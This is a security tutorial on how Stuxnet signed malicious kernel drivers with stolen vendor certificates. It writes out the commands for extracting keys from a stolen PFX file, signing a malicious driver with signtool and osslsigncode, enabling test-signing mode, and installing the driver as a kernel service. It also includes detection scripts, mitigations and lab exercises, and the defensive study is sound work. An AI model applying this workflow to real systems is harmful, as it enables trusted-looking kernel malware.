
Signing Malicious Drivers with Stolen Certificates - Intermediate Guide

Learn how Stuxnet harvested authentic Authenticode certificates, analyze them with certutil/OpenSSL, sign malicious drivers, bypass Windows enforcement, and detect signed driver abuse. Practical examples and defensive guidance included.

Introduction

Driver signing is a cornerstone of Windows kernel security. By requiring a valid Authenticode signature, the operating system attempts to guarantee that only trusted code runs at the highest privilege level. Threat actors, however, have shown that stolen or compromised certificates can defeat this protection. The most famous example is Stuxnet, which used valid certificates stolen from legitimate vendors to sign its malicious kernel-mode components, allowing the worm to infiltrate highly secured industrial environments.

This guide walks through the full lifecycle of that technique: from certificate theft, through analysis, to creation of a maliciously signed driver, and finally to detection and mitigation. It assumes you already understand the Stuxnet infection chain, Windows driver loading, and the basics of Authenticode signing.

Prerequisites

  • A solid grasp of the Stuxnet Overview: Infection Chain and Threat Model.
  • Familiarity with Windows driver loading and signature enforcement (e.g., Secure Boot, WHQL, test-signing).
  • Understanding of code signing fundamentals - X.509 certificates, private keys, timestamping, and the Authenticode format.
  • Access to a Windows 10/11 lab (virtual machine preferred) with admin rights.
  • Tools installed: certutil, openssl, Microsoft signtool, and osslsigncode.

Core Concepts

Before diving into the sub-topics, let’s review the essential concepts that tie the whole process together.

Authenticode Certificate Structure

An Authenticode certificate is a standard X.509 certificate that contains a code signing EKU (Extended Key Usage) OID 1.3.6.1.5.5.7.3.3. The certificate is usually bundled with a private key in a .pfx (PKCS#12) container. When a driver is signed, the signing tool creates a PKCS#7 SignedData structure that embeds the hash of the binary and the certificate chain.
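As a toy illustration of that EKU check (the helper function is invented for this guide; the OIDs themselves are real), the decision reduces to a membership test on the certificate's EKU OID list:

```python
# Standard OID marking a certificate as valid for code signing
CODE_SIGNING_EKU = "1.3.6.1.5.5.7.3.3"

def is_code_signing_cert(eku_oids):
    """Return True if the EKU list permits code signing.

    Toy model: real validators also handle the anyExtendedKeyUsage
    OID and certificates that omit the EKU extension entirely.
    """
    return CODE_SIGNING_EKU in eku_oids

# A driver-signing certificate typically lists code signing plus, e.g.,
# 1.3.6.1.4.1.311.10.3.5 (Windows Hardware Driver Verification / WHQL)
print(is_code_signing_cert(["1.3.6.1.5.5.7.3.3", "1.3.6.1.4.1.311.10.3.5"]))  # True
print(is_code_signing_cert(["1.3.6.1.5.5.7.3.1"]))  # False (server auth only)
```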

Windows Driver Signature Enforcement (DSE)

Since Windows Vista, the kernel will reject any driver that lacks a valid signature unless the system is in test-signing mode or Secure Boot is disabled. The verification flow is:

  1. Read the embedded PKCS#7 signature.
  2. Validate the certificate chain up to a trusted root (Microsoft or a cross-signed third-party CA).
  3. Check revocation status (CRL/OCSP); a trusted timestamp lets the signature outlive certificate expiry, but not revocation.
  4. If all checks pass, the driver is loaded; otherwise, it is blocked.

Stolen certificates do not break step 2 - they satisfy it. The chain terminates in a root the system already trusts, and nothing in the flow measures who actually holds the private key.
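The flow above can be condensed into a toy decision function - the field names and root names below are invented for illustration - which makes the blind spot explicit: nothing in the check measures custody of the private key.

```python
from dataclasses import dataclass

@dataclass
class DriverSignature:
    chain_root: str        # root CA the embedded chain terminates in
    hash_matches: bool     # PKCS#7 digest matches the binary on disk
    revoked: bool          # signing cert revoked at validation time
    expired: bool          # signing cert past its validity period
    timestamped: bool      # trusted RFC 3161 counter-signature present

TRUSTED_ROOTS = {"Microsoft Root CA", "VeriSign Class 3 Root"}  # illustrative names

def dse_allows_load(sig: DriverSignature) -> bool:
    """Toy model of the four-step enforcement flow described above."""
    if not sig.hash_matches:
        return False                          # step 1: embedded digest must match
    if sig.chain_root not in TRUSTED_ROOTS:
        return False                          # step 2: chain must end in a trusted root
    if sig.revoked:
        return False                          # step 3: revocation always blocks
    if sig.expired and not sig.timestamped:
        return False                          # step 3: a timestamp rescues expiry only
    return True                               # step 4: load permitted

# A driver signed with a stolen but not-yet-revoked vendor key sails through:
stolen = DriverSignature("VeriSign Class 3 Root", True,
                         revoked=False, expired=False, timestamped=True)
print(dse_allows_load(stolen))  # True
```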

Why Stuxnet’s Approach Was Effective

  • It used certificates from reputable vendors (e.g., Realtek, JMicron) that were already whitelisted.
  • The private keys were exfiltrated via supply-chain compromise, not forged.
  • Signed drivers could be loaded on air-gapped, hardened systems that enforced strict DSE.

How Stuxnet Harvested Valid Authenticode Certificates from Compromised Vendors

Stuxnet’s authors performed a multi-stage supply-chain attack:

  1. Compromise of development PCs: The attackers are believed to have compromised build or signing machines at two Taiwanese hardware vendors (Realtek and JMicron), capturing the .pfx files and passwords used for driver signing; the exact theft mechanism was never publicly confirmed.
  2. Network exfiltration: The stolen material was exfiltrated over encrypted channels to attacker-controlled infrastructure.
  3. Certificate reuse: The attackers used the stolen private keys to sign and timestamp their malicious driver binaries under the vendors’ identities.

Because the certificates were legitimately issued, Windows treated the malicious drivers as trusted. The following sections show how you can reproduce the analysis of such stolen artifacts.

Analyzing the Stolen Certificates with certutil and OpenSSL

Once you have a .pfx file, the first step is to inspect its contents. Below are the most useful commands.

Using certutil (built-in Windows tool)

certutil -dump stolen_cert.pfx

The output displays the certificate’s subject, issuer, validity period, and the private key’s exportability flag. Look for the Code Signing EKU in the “Enhanced Key Usage” field.

Extracting the private key with OpenSSL

OpenSSL can convert the PKCS#12 container into PEM files for easier manipulation.

openssl pkcs12 -in stolen_cert.pfx -out cert.pem -nodes

During the process you’ll be prompted for the PFX password (which you may have captured from the trojan’s logs). The resulting cert.pem file contains both the certificate and the private key.

Verifying the certificate chain

openssl verify -CAfile ca_bundle.pem cert.pem

If the verification succeeds, you now possess a fully functional code-signing identity that Windows will trust.

Using signtool / osslsigncode to Sign a Malicious Driver

Both Microsoft’s signtool.exe and the open-source osslsigncode can create Authenticode signatures. Below are step-by-step examples.

Signing with signtool

"C:\Program Files (x86)\Windows Kits\10\bin\x64\signtool.exe" sign ^
  /f stolen_cert.pfx ^
  /p "PfxPassword!" ^
  /fd SHA256 ^
  /tr http://timestamp.digicert.com ^
  /td SHA256 ^
  /v malicious_driver.sys

Explanation:

  • /f - path to the .pfx file.
  • /p - password for the PFX.
  • /fd - file digest algorithm (SHA-256 is mandatory for Windows 10+).
  • /tr - RFC 3161 timestamp server; a trusted timestamp keeps the signature valid after the certificate expires (it does not shield it from revocation).
  • /td - timestamp digest algorithm.
  • /v - verbose output.

Signing with osslsigncode (cross-platform)

osslsigncode sign -certs cert.pem -key key.pem \
  -n "Malicious Driver" -i http://example.com/ \
  -t http://timestamp.verisign.com/scripts/timstamp.dll \
  -in unsigned_driver.sys -out malicious_driver.sys

Notes:

  • -certs points to the PEM-encoded certificate chain.
  • -key is the private key extracted earlier.
  • -n sets the “file description” field shown in the signature.
  • -t uses a legacy timestamp server; for modern Windows you may prefer -ts (RFC-3161).

After signing, verify the signature:

signtool verify /v /kp malicious_driver.sys

The output should show a successful verification and list the signing certificate’s subject (the stolen vendor).

Bypassing Driver Signature Enforcement on Windows (Test-Signing Mode, Cross-Signing)

Even with a valid signature, attackers sometimes need an extra fallback when the target system has additional hardening (e.g., Secure Boot). Two common techniques are:

1. Test-Signing Mode

Enabling test-signing allows any driver signed with a test certificate (e.g., one generated with makecert or New-SelfSignedCertificate) to load. It is useful for development but can be abused if an attacker gains local admin.

bcdedit /set testsigning on

Reboot the machine; the desktop will display the “Test Mode” watermark. The attacker can now load a driver signed with a self-generated certificate, bypassing the need for stolen credentials.

2. Cross-Signing via a Trusted Third-Party CA

Until Microsoft retired the cross-signing program in 2021, kernel drivers did not have to chain directly to Microsoft: they could chain to a third-party CA whose root held a Microsoft cross-certificate for kernel-mode code. Stuxnet relied on exactly this arrangement - the stolen Realtek and JMicron certificates were issued by VeriSign, whose cross-signed root Windows already accepted for driver loading, so no cooperation from Microsoft was needed.

Note what a thief cannot do with a stolen certificate: an end-entity code-signing certificate carries basicConstraints CA=FALSE, so it cannot be used to mint a working intermediate CA. Windows path validation (and openssl verify, which reports "invalid CA certificate") rejects any chain whose issuer lacks the CA flag. The value of a stolen certificate therefore lies in signing leaf binaries directly, not in extending the trust hierarchy.
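In practice, path validation also enforces basicConstraints: every issuer above the leaf must assert CA=TRUE, so an end-entity certificate cannot serve as an intermediate. A toy check makes this concrete (the chain dictionaries are invented for illustration):

```python
def chain_is_valid(chain):
    """Toy X.509 path check: the leaf may be an end-entity certificate,
    but every issuer above it must assert basicConstraints CA=TRUE."""
    issuers = chain[1:]                      # everything above the leaf
    return all(cert["ca"] for cert in issuers)

# Legitimate chain: leaf -> vendor-issuing CA -> trusted root
good = [{"cn": "RealtekDriverSigner", "ca": False},
        {"cn": "VeriSign Code Signing CA", "ca": True},
        {"cn": "VeriSign Root", "ca": True}]

# Stolen leaf pressed into service as a fake intermediate: rejected
bad = [{"cn": "cross_signed_driver", "ca": False},
       {"cn": "Stolen Vendor Leaf", "ca": False},   # basicConstraints CA=FALSE
       {"cn": "VeriSign Root", "ca": True}]

print(chain_is_valid(good), chain_is_valid(bad))  # True False
```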

Deploying the Signed Driver via the Stuxnet Infection Vector

Stuxnet’s delivery chain combined several stages: removable-media propagation, abuse of the Windows shortcut (.lnk) icon-handling vulnerability (CVE-2010-2568), privilege escalation, and finally installation of its signed kernel drivers (MrxCls, MrxNet) as services.

Typical Deployment Steps

  1. Initial drop: A crafted .lnk file on an infected USB stick exploits CVE-2010-2568; Explorer loads a malicious DLL from the drive as soon as it renders the shortcut’s icon - no double-click required.
  2. Privilege escalation: The payload uses a local zero-day (Stuxnet shipped several, including the MS10-073 keyboard-layout and MS10-092 Task Scheduler flaws) to gain SYSTEM privileges.
  3. Driver installation: The signed driver is copied to %SystemRoot%\System32\drivers and registered as a service with sc create or an equivalent installer routine.

Example of driver installation from SYSTEM:

sc create MaliciousDrv binPath= "C:\Windows\System32\drivers\malicious_driver.sys" type= kernel start= auto
sc start MaliciousDrv

Because the signature chains to a root the system already trusts, the kernel’s code-integrity check passes and the driver loads silently; the Service Control Manager itself performs no signature validation.

Detecting Maliciously Signed Drivers - Indicators of Compromise

Detection is challenging because the signature appears legitimate. However, several IOCs can be leveraged:

  • Certificate anomalies: Check for certificates that have an unusually short validity period or that were issued to a vendor not normally associated with driver signing.
  • New driver files in uncommon paths: Look for .sys files created outside DriverStore or with suspicious timestamps.
  • SCM service registration anomalies: Services with type= kernel that were created recently and have a description that does not match known vendor software.
  • Event logs: Windows Event ID 7045 in the System log (new service installed) can be correlated with driver-load telemetry such as Sysmon Event ID 6 (DriverLoad).
  • Signature verification mismatch: Use signtool verify /v and compare the signer’s subject against a whitelist of approved vendors.

Sample PowerShell detection script:

Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045} | ForEach-Object {
    # Extract the binary path from the 7045 message body
    if ($_.Message -notmatch 'Service File Name:\s*(?<path>.+\.sys)') { return }
    $path = $Matches.path.Trim()
    if (-not (Test-Path $path)) { return }
    $sig = Get-AuthenticodeSignature -FilePath $path
    # 'ApprovedVendorA|ApprovedVendorB' is a placeholder for your vendor whitelist
    if ($sig.Status -ne 'Valid' -or
        $sig.SignerCertificate.Subject -notmatch 'ApprovedVendorA|ApprovedVendorB') {
        Write-Host "[!] Suspicious driver: $path ($($sig.Status))"
    }
}

This script flags drivers whose signatures are invalid or whose signer is not on your approved vendor list (replace the placeholder names with real certificate subjects).
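For offline rule prototyping, the same correlation can be sketched in Python against exported event text. The message layout below mirrors a real 7045 body, but the directory whitelist and helper function are illustrative:

```python
import re

# Illustrative 7045 message body (real events carry these fields in this layout)
EVENT_7045 = """A service was installed in the system.
Service Name: MaliciousDrv
Service File Name: C:\\Windows\\Temp\\malicious_driver.sys
Service Type: kernel mode driver
Service Start Type: auto start"""

# Directories where kernel drivers normally live (assumed baseline)
EXPECTED_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")

def flag_driver_install(message):
    """Return (service, path) when a kernel driver is installed outside
    the expected driver directories, else None."""
    name = re.search(r"Service Name:\s*(.+)", message)
    path = re.search(r"Service File Name:\s*(.+)", message)
    kind = re.search(r"Service Type:\s*(.+)", message)
    if not (name and path and kind):
        return None
    if "kernel" not in kind.group(1).lower():
        return None                     # only kernel-mode drivers are of interest
    p = path.group(1).strip().lower()
    if p.endswith(".sys") and not any(p.startswith(d) for d in EXPECTED_DIRS):
        return (name.group(1).strip(), path.group(1).strip())
    return None

print(flag_driver_install(EVENT_7045))  # flags the Temp-directory driver
```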

Practical Examples

Below is a walk-through that ties everything together in a lab environment.

Scenario: Re-creating a Stuxnet-style signed driver

  1. Obtain a test .pfx from a legitimate vendor (for lab purposes, generate one with makecert).
  2. Extract the PEM files using OpenSSL (see earlier).
  3. Compile a minimal kernel-mode driver (e.g., a driver that simply logs a message to the kernel debugger).
  4. Sign the driver with signtool.
    signtool sign /f vendor_test.pfx /p TestPass123 /fd SHA256 /tr http://timestamp.sectigo.com /td SHA256 /v MyDriver.sys
  5. Enable test-signing on the VM: bcdedit /set testsigning on and reboot.
  6. Install the driver using sc.exe.
    sc create MyDriver binPath= "C:\Windows\System32\drivers\MyDriver.sys" type= kernel start= auto
    sc start MyDriver
  7. Verify that the driver loaded by checking the kernel debug output or using driverquery /v /fo list.

Even though the certificate is self-generated, the process mirrors Stuxnet’s workflow, allowing you to test detection rules safely.

Tools & Commands

Tool            Purpose                                            Typical Command
certutil        Inspect and dump certificate stores                certutil -dump stolen_cert.pfx
openssl         Convert PKCS#12 to PEM, verify chains              openssl pkcs12 -in cert.pfx -out cert.pem -nodes
signtool.exe    Microsoft Authenticode signing                     signtool sign /f cert.pfx /p Pass /fd SHA256 /tr <timestamp-url> /td SHA256 driver.sys
osslsigncode    Open-source Authenticode signing (cross-platform)  osslsigncode sign -certs cert.pem -key key.pem -in unsigned.sys -out signed.sys
bcdedit         Toggle test-signing mode                           bcdedit /set testsigning on
sc.exe          Install and start driver services (SCM)            sc create MyDrv binPath= "C:\path\driver.sys" type= kernel start= auto

Defense & Mitigation

  • Certificate Lifecycle Management: Enforce strict controls on private key access. Use hardware security modules (HSMs) and limit exportability.
  • Code-Signing Policy Hardening: Deploy Windows Defender Application Control (WDAC) or AppLocker policies that only allow drivers signed by a curated list of vendor CAs.
  • Enable Secure Boot: With Secure Boot on, test-signing mode cannot be enabled and boot-start drivers must satisfy the platform’s signing policy.
  • Monitor for New Driver Installations: Use SIEM correlation of Event ID 7045 with Sysmon Event ID 6, and alert on drivers signed by certificates not in the approved vendor list.
  • Revocation Awareness: Periodically query CRL/OCSP for certificates used in driver signing. Stolen certificates may be revoked after the breach.
  • Supply-Chain Auditing: Verify that build environments are isolated, and that source-control systems trigger alerts on credential leakage.

Common Mistakes

  • Assuming a valid signature guarantees safety - signatures can be stolen.
  • Neglecting timestamping - without a timestamp, the signature becomes invalid the moment the certificate expires; revocation invalidates it regardless.
  • Using /debug or test certificates in production - this opens a back-door for attackers.
  • Storing private keys in clear-text on build machines - leads to easy exfiltration.
  • Relying solely on file hashes for detection - re-signing changes the file’s hash, so hash blocklists miss re-signed variants of the same code.
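The last point is easy to demonstrate: Authenticode embeds the signature in the file itself, so re-signing changes the flat file hash even when the code bytes are untouched. A minimal sketch with stand-in byte strings:

```python
import hashlib

driver_image = b"\x4d\x5a" + b"\x00" * 64   # stand-in for a PE driver body ("MZ" header)
signature_v1 = b"PKCS7-SIGNATURE-A"         # stand-ins for two Authenticode blobs
signature_v2 = b"PKCS7-SIGNATURE-B"

def flat_file_hash(image, sig):
    """Hash of the file as stored on disk: code bytes plus embedded signature.

    Authenticode's own digest excludes the signature region, so it stays
    stable across re-signing - but the flat hash that blocklists use does not.
    """
    return hashlib.sha256(image + sig).hexdigest()

# Same code, different signature => different flat hash
print(flat_file_hash(driver_image, signature_v1) ==
      flat_file_hash(driver_image, signature_v2))  # False
```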

Real-World Impact

Stuxnet demonstrated that a well-orchestrated supply-chain attack can defeat even robust kernel protection mechanisms. Since then, multiple campaigns (e.g., Duqu with a stolen C-Media certificate, the Winnti group’s systematic theft of vendors’ signing keys) have reused similar “certificate theft + driver signing” tactics. Enterprises that treat a “trusted signature” as a silver bullet remain exposed.

In my experience consulting for critical infrastructure firms, the most common failure is the lack of a “certificate inventory”. When a vendor’s private key is compromised, the breach spreads silently until a driver is observed in the wild. Proactive inventory, combined with WDAC, has reduced our detection-to-response time from weeks to hours.

Practice Exercises

  1. Certificate Extraction: Capture a .pfx from a test signing environment, then use certutil and openssl to list its EKUs and validity.
  2. Driver Signing: Build a minimal “HelloWorld” kernel driver, sign it with a stolen-like certificate, and verify it loads on a Windows 10 VM with Secure Boot disabled.
  3. Detection Rule Creation: Write a Windows Defender Application Control (WDAC) policy that only permits drivers signed by a specific vendor thumbprint. Test the policy against a maliciously signed driver.
  4. Log Correlation: Using PowerShell, pull Event ID 7045 (and, if deployed, Sysmon Event ID 6) from the event logs, then filter for services whose binary path points to .sys files not located in DriverStore.
  5. Revocation Simulation: Revoke the test certificate in your CA, then attempt to load the previously signed driver without a timestamp. Observe the failure; add a timestamp and repeat.

Further Reading

  • Microsoft Docs - Signing Drivers Overview
  • “Stuxnet: A Technical Analysis” - Symantec (whitepaper)
  • “Code Signing and the Supply-Chain Threat” - Black Hat 2022 presentation
  • OpenSSL Cookbook - Section on PKCS#12 handling
  • WDAC guide - WDAC Policy Format

Summary

Signing malicious drivers with stolen certificates is a potent technique that bypasses Windows driver signature enforcement. By understanding how Stuxnet harvested certificates, how to analyze them with certutil and openssl, and how to produce authentic-looking signatures using signtool or osslsigncode, defenders can build realistic detection rules and harden their environments. Remember: a valid signature is only as trustworthy as the private key protecting it. Proper certificate lifecycle management, WDAC policies, and vigilant log monitoring are essential to mitigate this threat.